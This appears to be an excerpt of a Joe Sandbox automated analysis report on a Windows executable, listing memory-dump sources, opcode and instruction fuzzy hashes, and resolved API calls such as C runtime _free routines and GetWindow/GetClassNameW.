                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HeapProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 54951025-0
                                                                                                              • Opcode ID: 7c2822cdb75af06da51511dd25913e3cb679c7c0779f904dffe693ae5bc6c198
                                                                                                              • Instruction ID: fd657ab4fd5848c730048d454ca5b984f15c4ff29ffe929fa52c4cd1260f7a88
                                                                                                              • Opcode Fuzzy Hash: 7c2822cdb75af06da51511dd25913e3cb679c7c0779f904dffe693ae5bc6c198
                                                                                                              • Instruction Fuzzy Hash: 18A00170602201DBA7608F36AB0A2093AA9EA566A1755907EA809C66A0EB3585909A49
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f76edbdb3f4a612c21f71557bb68a806c2ac5dff8f8e7f0331655fa6002ea0a3
                                                                                                              • Instruction ID: dfd5f8485f8f28078744b9d16fb7861ba3c224712c308f7df04de3e601e41135
                                                                                                              • Opcode Fuzzy Hash: f76edbdb3f4a612c21f71557bb68a806c2ac5dff8f8e7f0331655fa6002ea0a3
                                                                                                              • Instruction Fuzzy Hash: 45621A71604B859FCB25CF38C8A06BAB7E1AF55305F04856FDC9A8B347D638E949CB18
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 90a98d7e6f2e54dcba7a323e5310e852aff7c38bf50c3d5cf95a57ea582718e0
                                                                                                              • Instruction ID: 4fc0a5c9e9295f10d127ee001449fc7b29358aa8d8fb187e245786cf7a0b622b
                                                                                                              • Opcode Fuzzy Hash: 90a98d7e6f2e54dcba7a323e5310e852aff7c38bf50c3d5cf95a57ea582718e0
                                                                                                              • Instruction Fuzzy Hash: 5762337020478A9FC719CF28C9805B9FBE0FB46309F45866EDC9687742D738E959CB49
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c11df8756d099823b9e38222dbb77727418297263203a366b416988efb5d9dfb
                                                                                                              • Instruction ID: b4a61580921c67ff0507593de5b2da51d3689bbd9e0dcfe34b762eec9e13ccac
                                                                                                              • Opcode Fuzzy Hash: c11df8756d099823b9e38222dbb77727418297263203a366b416988efb5d9dfb
                                                                                                              • Instruction Fuzzy Hash: A55258B26047019FC758CF19C891A6AF7E1FFC8304F89892DF9968B355D334E9198B86
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3b43c4c734633723b8f10fe187e49e51ae743f9f2dba67b7d1e17264165f620b
                                                                                                              • Instruction ID: 7eeb0b027ab6d534b4a920ca303620d309ce7733763793feb8ea0004e8d6d31f
                                                                                                              • Opcode Fuzzy Hash: 3b43c4c734633723b8f10fe187e49e51ae743f9f2dba67b7d1e17264165f620b
                                                                                                              • Instruction Fuzzy Hash: FB12F8B1604B068BC728CF28C5D0679B3E1FF55309F50892FD997C7A82D778A899CB49
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f8cc7b9c1633a7263b5f958cae30728e000c8fc340d0c806a8ca97638a0825d5
                                                                                                              • Instruction ID: 0ffe80269b3dc01cbca4fae071f70f555ac69f11f60855b4c1affa070294d5e9
                                                                                                              • Opcode Fuzzy Hash: f8cc7b9c1633a7263b5f958cae30728e000c8fc340d0c806a8ca97638a0825d5
                                                                                                              • Instruction Fuzzy Hash: A0F18971A083458FE714CE29C98456BBBE2FFC9708F144A2EF4C597355D738E9068B8A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                              • Instruction ID: 6a18ba2024195d4107c2411fed3e08ffeb1e33b6c91d748bf9291e5008868199
                                                                                                              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                              • Instruction Fuzzy Hash: E3C1C3762050930ADB1D4639853003FBEA15E927B271A47BFE8B6CF2C6FE18D52CD519
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                              • Instruction ID: 6ecbd04ed3ec62835a0ac7463fecd3cef2ef4317a7cd432043631c0b093b6077
                                                                                                              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                              • Instruction Fuzzy Hash: 19C1C3762050930ADB2D4639C53403FBEA15A917B271A03BEECB2CF2D6FE18D52CD529
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                              • Instruction ID: e4154d6a09996899b2824d21dceda94e8b42caabd7c3e811effe8aacb781db7e
                                                                                                              • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                              • Instruction Fuzzy Hash: 69C1B4762050930ADF1D4639853403FBAA15AA27B271A07BFECB6CF2C6FE18D52CD615
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                              • Instruction ID: 95a320a5960e525d0b0b917063c1023dbfda1f43eaabe34bc2908d957c7fa684
                                                                                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                              • Instruction Fuzzy Hash: C7C1A4762050530ADB2D463AC53403FBEA15AA17B271A47BFE8B6CF2C6FE18D52C8515
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: be3d45e5a1d7a69d636e1202b450c33364980a314bfca8064ee703e32d5b372c
                                                                                                              • Instruction ID: 3a086b3947e74c81910085b89d2cdc491a274a44681ff666990fb4446ad6f3a3
                                                                                                              • Opcode Fuzzy Hash: be3d45e5a1d7a69d636e1202b450c33364980a314bfca8064ee703e32d5b372c
                                                                                                              • Instruction Fuzzy Hash: A9E147755183808FD344CF69D89086BBBF0AFDA300F4909AEF5D597362C234EA59CB66
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 258a2619ca224506e2ce8481b4959e2ad5c6699b1b0424d45743f46b69a4843c
                                                                                                              • Instruction ID: 64c4158f641f42689f017612f6ca46e592e6460f298b7db2740a9fa3ed774134
                                                                                                              • Opcode Fuzzy Hash: 258a2619ca224506e2ce8481b4959e2ad5c6699b1b0424d45743f46b69a4843c
                                                                                                              • Instruction Fuzzy Hash: 059177B12003458BD724EF28D985BBE73D4AB51306F10092FED86872C3DABC960DC75A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c768ec4f8c5c624f7e5123540e17805f68f12ee47558b3c4ee5314f48efd7ef4
                                                                                                              • Instruction ID: c09cf0a5782c1df238f013cf127f9f73f66f5e7024fe2cf93874f28cfead90ed
                                                                                                              • Opcode Fuzzy Hash: c768ec4f8c5c624f7e5123540e17805f68f12ee47558b3c4ee5314f48efd7ef4
                                                                                                              • Instruction Fuzzy Hash: A26156B1600F0976DA384E288B55BFF2394EB11B44F14091BE882DF391F6DDAD86925F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9ea23a0b5be8d720a81cc3f877502472f5d544f68c9a06fa8112536a0a6d4999
                                                                                                              • Instruction ID: ad9fa8ea9b0ce7486796bb82c3b30efcc097c294d8b82481eb3b9bf8b52f15ff
                                                                                                              • Opcode Fuzzy Hash: 9ea23a0b5be8d720a81cc3f877502472f5d544f68c9a06fa8112536a0a6d4999
                                                                                                              • Instruction Fuzzy Hash: 57713F712047454BDB24DE29C9C4B6E3791AB9134BF00092FFD868B283DA7C9A4DC75E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 09caa03a512596f18d7c0d0e6d951086d0e76d11dcabc4d874014374ac7ac190
                                                                                                              • Instruction ID: eadf7b6cc6620bb9488beb1cd3160a3cab710ade34f24b714b81b60818543773
                                                                                                              • Opcode Fuzzy Hash: 09caa03a512596f18d7c0d0e6d951086d0e76d11dcabc4d874014374ac7ac190
                                                                                                              • Instruction Fuzzy Hash: B5818DA221A2D49ED3464F7D38A02E93FA05777340B1C48FBD4C9972B3C03A859DD72A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 90f7240d1f13d15c40b6d0fc670e71e2f81972eeadf6ba80cbb58ef2fe06d546
                                                                                                              • Instruction ID: e82f74fe13aae2d21450552d62a5741c48171216af26be02b98636823a4caf14
                                                                                                              • Opcode Fuzzy Hash: 90f7240d1f13d15c40b6d0fc670e71e2f81972eeadf6ba80cbb58ef2fe06d546
                                                                                                              • Instruction Fuzzy Hash: E7512671A083028FC748CF19D48055AF7E1FF88314F058A2EE899A7740DB34E959CB9A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 03d8200d211fb2155360bb18f1da6528e951efe338ec765a37701bdcb59cc893
                                                                                                              • Instruction ID: ee2439161c939ff7b722b221610f9c28493a82d5d19e0701c3898fcb750c193d
                                                                                                              • Opcode Fuzzy Hash: 03d8200d211fb2155360bb18f1da6528e951efe338ec765a37701bdcb59cc893
                                                                                                              • Instruction Fuzzy Hash: EB31E0B16047098FC714DF29C95126EBBD0FB96305F04452FE88AD7342C678E919CB56
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 72b72f0446a356e41ce4f756e96f934fb6868651e9d949dc26a2723c92c85f7a
                                                                                                              • Instruction ID: 80a7c1d424c5359fac754cef9e63e89545de91b0b5afbc3f4874ecc866e9a51d
                                                                                                              • Opcode Fuzzy Hash: 72b72f0446a356e41ce4f756e96f934fb6868651e9d949dc26a2723c92c85f7a
                                                                                                              • Instruction Fuzzy Hash: C2219B32A201655BCB18CF3DEC9453B7751D786301786813BEE4A8B391C639E965C7E4
                                                                                                              APIs
                                                                                                              • ___free_lconv_mon.LIBCMT ref: 004695D1
                                                                                                                • Part of subcall function 0046916C: _free.LIBCMT ref: 00469189
                                                                                                                • Part of subcall function 0046916C: _free.LIBCMT ref: 0046919B
                                                                                                                • Part of subcall function 0046916C: _free.LIBCMT ref: 004691AD
                                                                                                                • Part of subcall function 0046916C: _free.LIBCMT ref: 004691BF
                                                                                                                • Part of subcall function 0046916C: _free.LIBCMT ref: 004691D1
                                                                                                                • Part of subcall function 0046916C: _free.LIBCMT ref: 004691E3
                                                                                                                • Part of subcall function 0046916C: _free.LIBCMT ref: 004691F5
                                                                                                                • Part of subcall function 0046916C: _free.LIBCMT ref: 00469207
                                                                                                                • Part of subcall function 0046916C: _free.LIBCMT ref: 00469219
                                                                                                                • Part of subcall function 0046916C: _free.LIBCMT ref: 0046922B
                                                                                                                • Part of subcall function 0046916C: _free.LIBCMT ref: 0046923D
                                                                                                                • Part of subcall function 0046916C: _free.LIBCMT ref: 0046924F
                                                                                                                • Part of subcall function 0046916C: _free.LIBCMT ref: 00469261
                                                                                                              • _free.LIBCMT ref: 004695C6
                                                                                                                • Part of subcall function 004659C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00469301,?,00000000,?,00000000,?,00469328,?,00000007,?,?,00469725,?), ref: 004659D8
                                                                                                                • Part of subcall function 004659C2: GetLastError.KERNEL32(?,?,00469301,?,00000000,?,00000000,?,00469328,?,00000007,?,?,00469725,?,?), ref: 004659EA
                                                                                                              • _free.LIBCMT ref: 004695E8
                                                                                                              • _free.LIBCMT ref: 004695FD
                                                                                                              • _free.LIBCMT ref: 00469608
                                                                                                              • _free.LIBCMT ref: 0046962A
                                                                                                              • _free.LIBCMT ref: 0046963D
                                                                                                              • _free.LIBCMT ref: 0046964B
                                                                                                              • _free.LIBCMT ref: 00469656
                                                                                                              • _free.LIBCMT ref: 0046968E
                                                                                                              • _free.LIBCMT ref: 00469695
                                                                                                              • _free.LIBCMT ref: 004696B2
                                                                                                              • _free.LIBCMT ref: 004696CA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                              • String ID:
                                                                                                              • API String ID: 161543041-0
                                                                                                              • Opcode ID: 302b4007b134a57c4452f6456e353b0b2cc8bad215830d887ccf394f14c0c2de
                                                                                                              • Instruction ID: 6b380d87632c566b638e86119b530b7ff66c0690c7e234be6b5c1f9413846540
                                                                                                              • Opcode Fuzzy Hash: 302b4007b134a57c4452f6456e353b0b2cc8bad215830d887ccf394f14c0c2de
                                                                                                              • Instruction Fuzzy Hash: 2E315BB2600701EFEF21AA39D845B5B73ECAB00324F10941FE489D7251FFB9AC548B1A
                                                                                                              APIs
                                                                                                              • GetWindow.USER32(?,00000005), ref: 0045B8DD
                                                                                                              • GetClassNameW.USER32(00000000,?,00000800), ref: 0045B90C
                                                                                                                • Part of subcall function 00450B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0044AC49,?,?,?,0044ABF8,?,-00000002,?,00000000,?), ref: 00450B28
                                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0045B92A
